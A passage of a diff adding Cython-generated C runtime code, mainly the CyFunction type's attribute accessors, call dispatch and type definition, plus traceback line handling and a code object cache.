*op, void *context) +{ + PyObject* result = (op->func_code) ? op->func_code : Py_None; + CYTHON_UNUSED_VAR(context); + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_init_defaults(__pyx_CyFunctionObject *op) { + int result = 0; + PyObject *res = op->defaults_getter((PyObject *) op); + if (unlikely(!res)) + return -1; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + op->defaults_tuple = PyTuple_GET_ITEM(res, 0); + Py_INCREF(op->defaults_tuple); + op->defaults_kwdict = PyTuple_GET_ITEM(res, 1); + Py_INCREF(op->defaults_kwdict); + #else + op->defaults_tuple = PySequence_ITEM(res, 0); + if (unlikely(!op->defaults_tuple)) result = -1; + else { + op->defaults_kwdict = PySequence_ITEM(res, 1); + if (unlikely(!op->defaults_kwdict)) result = -1; + } + #endif + Py_DECREF(res); + return result; +} +static int +__Pyx_CyFunction_set_defaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyTuple_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__defaults__ must be set to a tuple object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__defaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_tuple, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_defaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_tuple; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_tuple; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_kwdefaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__kwdefaults__ must be set to a dict object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__kwdefaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_kwdict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_kwdefaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_kwdict; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_kwdict; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_annotations(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value || value == Py_None) { + value = NULL; + } else if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__annotations__ must be set to a dict object"); + return -1; + } + Py_XINCREF(value); + __Pyx_Py_XDECREF_SET(op->func_annotations, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_annotations(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->func_annotations; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + result = PyDict_New(); + if (unlikely(!result)) return NULL; + op->func_annotations = result; + } + Py_INCREF(result); + return result; +} +static PyObject * +__Pyx_CyFunction_get_is_coroutine(__pyx_CyFunctionObject *op, void *context) { + int is_coroutine; + CYTHON_UNUSED_VAR(context); + if (op->func_is_coroutine) { + return __Pyx_NewRef(op->func_is_coroutine); + } + is_coroutine = op->flags & __Pyx_CYFUNCTION_COROUTINE; +#if PY_VERSION_HEX >= 0x03050000 + if (is_coroutine) { + PyObject *module, *fromlist, *marker = __pyx_n_s_is_coroutine; + fromlist = PyList_New(1); + if (unlikely(!fromlist)) return NULL; + Py_INCREF(marker); + PyList_SET_ITEM(fromlist, 0, marker); + module = PyImport_ImportModuleLevelObject(__pyx_n_s_asyncio_coroutines, NULL, NULL, fromlist, 0); + Py_DECREF(fromlist); + if (unlikely(!module)) goto ignore; + op->func_is_coroutine = __Pyx_PyObject_GetAttrStr(module, marker); + Py_DECREF(module); + if (likely(op->func_is_coroutine)) { + return __Pyx_NewRef(op->func_is_coroutine); + } +ignore: + PyErr_Clear(); + } +#endif + op->func_is_coroutine = __Pyx_PyBool_FromLong(is_coroutine); + return __Pyx_NewRef(op->func_is_coroutine); +} +static PyGetSetDef __pyx_CyFunction_getsets[] = { + {(char *) "func_doc", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "__doc__", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "func_name", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__name__", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__qualname__", (getter)__Pyx_CyFunction_get_qualname, (setter)__Pyx_CyFunction_set_qualname, 0, 0}, + {(char *) "func_dict", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "__dict__", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "func_globals", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "__globals__", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "func_closure", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "__closure__", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "func_code", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "__code__", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "func_defaults", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__defaults__", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__kwdefaults__", (getter)__Pyx_CyFunction_get_kwdefaults, (setter)__Pyx_CyFunction_set_kwdefaults, 0, 0}, + {(char *) "__annotations__", (getter)__Pyx_CyFunction_get_annotations, (setter)__Pyx_CyFunction_set_annotations, 0, 0}, + {(char *) "_is_coroutine", (getter)__Pyx_CyFunction_get_is_coroutine, 0, 0, 0}, + {0, 0, 0, 0, 0} +}; +static PyMemberDef __pyx_CyFunction_members[] = { + {(char *) "__module__", T_OBJECT, offsetof(PyCFunctionObject, m_module), 0, 0}, +#if CYTHON_USE_TYPE_SPECS + {(char *) "__dictoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_dict), READONLY, 0}, +#if CYTHON_METH_FASTCALL +#if CYTHON_BACKPORT_VECTORCALL + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_vectorcall), READONLY, 0}, +#else + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(PyCFunctionObject, vectorcall), READONLY, 0}, +#endif +#endif +#if PY_VERSION_HEX < 0x030500A0 + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_weakreflist), READONLY, 0}, +#else + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(PyCFunctionObject, m_weakreflist), READONLY, 0}, +#endif +#endif + {0, 0, 0, 0, 0} +}; +static PyObject * +__Pyx_CyFunction_reduce(__pyx_CyFunctionObject *m, PyObject *args) +{ + CYTHON_UNUSED_VAR(args); +#if PY_MAJOR_VERSION >= 3 + Py_INCREF(m->func_qualname); + return m->func_qualname; +#else + return PyString_FromString(((PyCFunctionObject*)m)->m_ml->ml_name); +#endif +} +static PyMethodDef __pyx_CyFunction_methods[] = { + {"__reduce__", (PyCFunction)__Pyx_CyFunction_reduce, METH_VARARGS, 0}, + {0, 0, 0, 0} +}; +#if PY_VERSION_HEX < 0x030500A0 +#define __Pyx_CyFunction_weakreflist(cyfunc) ((cyfunc)->func_weakreflist) +#else +#define __Pyx_CyFunction_weakreflist(cyfunc) (((PyCFunctionObject*)cyfunc)->m_weakreflist) +#endif +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject *op, PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyCFunctionObject *cf = (PyCFunctionObject*) op; + if (unlikely(op == NULL)) + return NULL; + op->flags = flags; + __Pyx_CyFunction_weakreflist(op) = NULL; + cf->m_ml = ml; + cf->m_self = (PyObject *) op; + Py_XINCREF(closure); + op->func_closure = closure; + Py_XINCREF(module); + cf->m_module = module; + op->func_dict = NULL; + op->func_name = NULL; + Py_INCREF(qualname); + op->func_qualname = qualname; + op->func_doc = NULL; +#if PY_VERSION_HEX < 0x030900B1 + op->func_classobj = NULL; +#else + ((PyCMethodObject*)op)->mm_class = NULL; +#endif + op->func_globals = globals; + Py_INCREF(op->func_globals); + Py_XINCREF(code); + op->func_code = code; + op->defaults_pyobjects = 0; + op->defaults_size = 0; + op->defaults = NULL; + op->defaults_tuple = NULL; + op->defaults_kwdict = NULL; + op->defaults_getter = NULL; + op->func_annotations = NULL; + op->func_is_coroutine = NULL; +#if CYTHON_METH_FASTCALL + switch (ml->ml_flags & (METH_VARARGS | METH_FASTCALL | METH_NOARGS | METH_O | METH_KEYWORDS | METH_METHOD)) { + case METH_NOARGS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_NOARGS; + break; + case METH_O: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_O; + break; + case METH_METHOD | METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD; + break; + case METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS; + break; + case METH_VARARGS | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = NULL; + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + Py_DECREF(op); + return NULL; + } +#endif + return (PyObject *) op; +} +static int +__Pyx_CyFunction_clear(__pyx_CyFunctionObject *m) +{ + Py_CLEAR(m->func_closure); + Py_CLEAR(((PyCFunctionObject*)m)->m_module); + Py_CLEAR(m->func_dict); + Py_CLEAR(m->func_name); + Py_CLEAR(m->func_qualname); + Py_CLEAR(m->func_doc); + Py_CLEAR(m->func_globals); + Py_CLEAR(m->func_code); +#if PY_VERSION_HEX < 0x030900B1 + Py_CLEAR(__Pyx_CyFunction_GetClassObj(m)); +#else + { + PyObject *cls = (PyObject*) ((PyCMethodObject *) (m))->mm_class; + ((PyCMethodObject *) (m))->mm_class = NULL; + Py_XDECREF(cls); + } +#endif + Py_CLEAR(m->defaults_tuple); + Py_CLEAR(m->defaults_kwdict); + Py_CLEAR(m->func_annotations); + Py_CLEAR(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_XDECREF(pydefaults[i]); + PyObject_Free(m->defaults); + m->defaults = NULL; + } + return 0; +} +static void __Pyx__CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + if (__Pyx_CyFunction_weakreflist(m) != NULL) + PyObject_ClearWeakRefs((PyObject *) m); + __Pyx_CyFunction_clear(m); + __Pyx_PyHeapTypeObject_GC_Del(m); +} +static void __Pyx_CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + PyObject_GC_UnTrack(m); + __Pyx__CyFunction_dealloc(m); +} +static int __Pyx_CyFunction_traverse(__pyx_CyFunctionObject *m, visitproc visit, void *arg) +{ + Py_VISIT(m->func_closure); + Py_VISIT(((PyCFunctionObject*)m)->m_module); + Py_VISIT(m->func_dict); + Py_VISIT(m->func_name); + Py_VISIT(m->func_qualname); + Py_VISIT(m->func_doc); + Py_VISIT(m->func_globals); + Py_VISIT(m->func_code); + Py_VISIT(__Pyx_CyFunction_GetClassObj(m)); + Py_VISIT(m->defaults_tuple); + Py_VISIT(m->defaults_kwdict); + Py_VISIT(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_VISIT(pydefaults[i]); + } + return 0; +} +static PyObject* +__Pyx_CyFunction_repr(__pyx_CyFunctionObject *op) +{ +#if PY_MAJOR_VERSION >= 3 + return PyUnicode_FromFormat("", + op->func_qualname, (void *)op); +#else + return PyString_FromFormat("", + PyString_AsString(op->func_qualname), (void *)op); +#endif +} +static PyObject * __Pyx_CyFunction_CallMethod(PyObject *func, PyObject *self, PyObject *arg, PyObject *kw) { + PyCFunctionObject* f = (PyCFunctionObject*)func; + PyCFunction meth = f->m_ml->ml_meth; + Py_ssize_t size; + switch (f->m_ml->ml_flags & (METH_VARARGS | METH_KEYWORDS | METH_NOARGS | METH_O)) { + case METH_VARARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) + return (*meth)(self, arg); + break; + case METH_VARARGS | METH_KEYWORDS: + return (*(PyCFunctionWithKeywords)(void*)meth)(self, arg, kw); + case METH_NOARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 0)) + return (*meth)(self, NULL); + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + case METH_O: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 1)) { + PyObject *result, *arg0; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + arg0 = PyTuple_GET_ITEM(arg, 0); + #else + arg0 = PySequence_ITEM(arg, 0); if (unlikely(!arg0)) return NULL; + #endif + result = (*meth)(self, arg0); + #if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF(arg0); + #endif + return result; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + return NULL; + } + PyErr_Format(PyExc_TypeError, "%.200s() takes no keyword arguments", + f->m_ml->ml_name); + return NULL; +} +static CYTHON_INLINE PyObject *__Pyx_CyFunction_Call(PyObject *func, PyObject *arg, PyObject *kw) { + return __Pyx_CyFunction_CallMethod(func, ((PyCFunctionObject*)func)->m_self, arg, kw); +} +static PyObject *__Pyx_CyFunction_CallAsMethod(PyObject *func, PyObject *args, PyObject *kw) { + PyObject *result; + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *) func; +#if CYTHON_METH_FASTCALL + __pyx_vectorcallfunc vc = __Pyx_CyFunction_func_vectorcall(cyfunc); + if (vc) { +#if CYTHON_ASSUME_SAFE_MACROS + return __Pyx_PyVectorcall_FastCallDict(func, vc, &PyTuple_GET_ITEM(args, 0), (size_t)PyTuple_GET_SIZE(args), kw); +#else + (void) &__Pyx_PyVectorcall_FastCallDict; + return PyVectorcall_Call(func, args, kw); +#endif + } +#endif + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + Py_ssize_t argc; + PyObject *new_args; + PyObject *self; + argc = PyTuple_GET_SIZE(args); + new_args = PyTuple_GetSlice(args, 1, argc); + if (unlikely(!new_args)) + return NULL; + self = PyTuple_GetItem(args, 0); + if (unlikely(!self)) { + Py_DECREF(new_args); +#if PY_MAJOR_VERSION > 2 + PyErr_Format(PyExc_TypeError, + "unbound method %.200S() needs an argument", + cyfunc->func_qualname); +#else + PyErr_SetString(PyExc_TypeError, + "unbound method needs an argument"); +#endif + return NULL; + } + result = __Pyx_CyFunction_CallMethod(func, self, new_args, kw); + Py_DECREF(new_args); + } else { + result = __Pyx_CyFunction_Call(func, args, kw); + } + return result; +} +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE int __Pyx_CyFunction_Vectorcall_CheckArgs(__pyx_CyFunctionObject *cyfunc, Py_ssize_t nargs, PyObject *kwnames) +{ + int ret = 0; + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + if (unlikely(nargs < 1)) { + PyErr_Format(PyExc_TypeError, "%.200s() needs an argument", + ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + ret = 1; + } + if (unlikely(kwnames) && unlikely(PyTuple_GET_SIZE(kwnames))) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no keyword arguments", ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + return ret; +} +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 0)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, NULL); +} +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 1)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, args[0]); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((_PyCFunctionFastWithKeywords)(void(*)(void))def->ml_meth)(self, args, nargs, kwnames); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; + PyTypeObject *cls = (PyTypeObject *) __Pyx_CyFunction_GetClassObj(cyfunc); +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((__Pyx_PyCMethod)(void(*)(void))def->ml_meth)(self, cls, args, (size_t)nargs, kwnames); +} +#endif +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_CyFunctionType_slots[] = { + {Py_tp_dealloc, (void *)__Pyx_CyFunction_dealloc}, + {Py_tp_repr, (void *)__Pyx_CyFunction_repr}, + {Py_tp_call, (void *)__Pyx_CyFunction_CallAsMethod}, + {Py_tp_traverse, (void *)__Pyx_CyFunction_traverse}, + {Py_tp_clear, (void *)__Pyx_CyFunction_clear}, + {Py_tp_methods, (void *)__pyx_CyFunction_methods}, + {Py_tp_members, (void *)__pyx_CyFunction_members}, + {Py_tp_getset, (void *)__pyx_CyFunction_getsets}, + {Py_tp_descr_get, (void *)__Pyx_PyMethod_New}, + {0, 0}, +}; +static PyType_Spec __pyx_CyFunctionType_spec = { + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#if (defined(_Py_TPFLAGS_HAVE_VECTORCALL) && CYTHON_METH_FASTCALL) + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + __pyx_CyFunctionType_slots +}; +#else +static PyTypeObject __pyx_CyFunctionType_type = { + PyVarObject_HEAD_INIT(0, 0) + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, + (destructor) __Pyx_CyFunction_dealloc, +#if !CYTHON_METH_FASTCALL + 0, +#elif CYTHON_BACKPORT_VECTORCALL + (printfunc)offsetof(__pyx_CyFunctionObject, func_vectorcall), +#else + offsetof(PyCFunctionObject, vectorcall), +#endif + 0, + 0, +#if PY_MAJOR_VERSION < 3 + 0, +#else + 0, +#endif + (reprfunc) __Pyx_CyFunction_repr, + 0, + 0, + 0, + 0, + __Pyx_CyFunction_CallAsMethod, + 0, + 0, + 0, + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#ifdef _Py_TPFLAGS_HAVE_VECTORCALL + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + 0, + (traverseproc) __Pyx_CyFunction_traverse, + (inquiry) __Pyx_CyFunction_clear, + 0, +#if PY_VERSION_HEX < 0x030500A0 + offsetof(__pyx_CyFunctionObject, func_weakreflist), +#else + offsetof(PyCFunctionObject, m_weakreflist), +#endif + 0, + 0, + __pyx_CyFunction_methods, + __pyx_CyFunction_members, + __pyx_CyFunction_getsets, + 0, + 0, + __Pyx_PyMethod_New, + 0, + offsetof(__pyx_CyFunctionObject, func_dict), + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, +#if PY_VERSION_HEX >= 0x030400a1 + 0, +#endif +#if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, +#endif +#if __PYX_NEED_TP_PRINT_SLOT + 0, +#endif +#if PY_VERSION_HEX >= 0x030C0000 + 0, +#endif +#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, +#endif +}; +#endif +static int __pyx_CyFunction_init(PyObject *module) { +#if CYTHON_USE_TYPE_SPECS + __pyx_CyFunctionType = __Pyx_FetchCommonTypeFromSpec(module, &__pyx_CyFunctionType_spec, NULL); +#else + CYTHON_UNUSED_VAR(module); + __pyx_CyFunctionType = __Pyx_FetchCommonType(&__pyx_CyFunctionType_type); +#endif + if (unlikely(__pyx_CyFunctionType == NULL)) { + return -1; + } + return 0; +} +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *func, size_t size, int pyobjects) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults = PyObject_Malloc(size); + if (unlikely(!m->defaults)) + return PyErr_NoMemory(); + memset(m->defaults, 0, size); + m->defaults_pyobjects = pyobjects; + m->defaults_size = size; + return m->defaults; +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *func, PyObject *tuple) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_tuple = tuple; + Py_INCREF(tuple); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_kwdict = dict; + Py_INCREF(dict); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->func_annotations = dict; + Py_INCREF(dict); +} + +/* CythonFunction */ +static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyObject *op = __Pyx_CyFunction_Init( + PyObject_GC_New(__pyx_CyFunctionObject, __pyx_CyFunctionType), + ml, flags, qualname, closure, module, globals, code + ); + if (likely(op)) { + PyObject_GC_Track(op); + } + return op; +} + +/* CLineInTraceback */ +#ifndef CYTHON_CLINE_IN_TRACEBACK +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line) { + PyObject *use_cline; + PyObject *ptype, *pvalue, *ptraceback; +#if CYTHON_COMPILING_IN_CPYTHON + PyObject **cython_runtime_dict; +#endif + CYTHON_MAYBE_UNUSED_VAR(tstate); + if (unlikely(!__pyx_cython_runtime)) { + return c_line; + } + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); +#if CYTHON_COMPILING_IN_CPYTHON + cython_runtime_dict = _PyObject_GetDictPtr(__pyx_cython_runtime); + if (likely(cython_runtime_dict)) { + __PYX_PY_DICT_LOOKUP_IF_MODIFIED( + use_cline, *cython_runtime_dict, + __Pyx_PyDict_GetItemStr(*cython_runtime_dict, __pyx_n_s_cline_in_traceback)) + } else +#endif + { + PyObject *use_cline_obj = __Pyx_PyObject_GetAttrStrNoError(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback); + if (use_cline_obj) { + use_cline = PyObject_Not(use_cline_obj) ? Py_False : Py_True; + Py_DECREF(use_cline_obj); + } else { + PyErr_Clear(); + use_cline = NULL; + } + } + if (!use_cline) { + c_line = 0; + (void) PyObject_SetAttr(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback, Py_False); + } + else if (use_cline == Py_False || (use_cline != Py_True && PyObject_Not(use_cline) != 0)) { + c_line = 0; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + return c_line; +} +#endif + +/* CodeObjectCache */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line) { + int start = 0, mid = 0, end = count - 1; + if (end >= 0 && code_line > entries[end].code_line) { + return count; + } + while (start < end) { + mid = start + (end - start) / 2; + if (code_line < entries[mid].code_line) { + end = mid; + } else if (code_line > entries[mid].code_line) { + start = mid + 1; + } else { + return mid; + } + } + if (code_line <= entries[mid].code_line) { + return mid; + } else { + return mid + 1; + } +} +static PyCodeObject *__pyx_find_code_object(int code_line) { + PyCodeObject* code_object; + int pos; + if (unlikely(!code_line) || unlikely(!__pyx_code_cache.entries)) { + return NULL; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if (unlikely(pos >= __pyx_code_cache.count) || unlikely(__pyx_code_cache.entries[pos].code_line != code_line)) { + return NULL; + } + code_object = __pyx_code_cache.entries[pos].code_object; + Py_INCREF(code_object); + return code_object; +} +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object) { + int pos, i; + __Pyx_CodeObjectCacheEntry* entries = __pyx_code_cache.entries; + if (unlikely(!code_line)) { + return; + } + if (unlikely(!entries)) { + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Malloc(64*sizeof(__Pyx_CodeObjectCacheEntry)); + if (likely(entries)) { + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = 64; + __pyx_code_cache.count = 1; + entries[0].code_line = code_line; + entries[0].code_object = code_object; + Py_INCREF(code_object); + } + return; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if ((pos < __pyx_code_cache.count) && unlikely(__pyx_code_cache.entries[pos].code_line == code_line)) { + PyCodeObject* tmp = entries[pos].code_object; + entries[pos].code_object = code_object; + Py_DECREF(tmp); + return; + } + if (__pyx_code_cache.count == __pyx_code_cache.max_count) 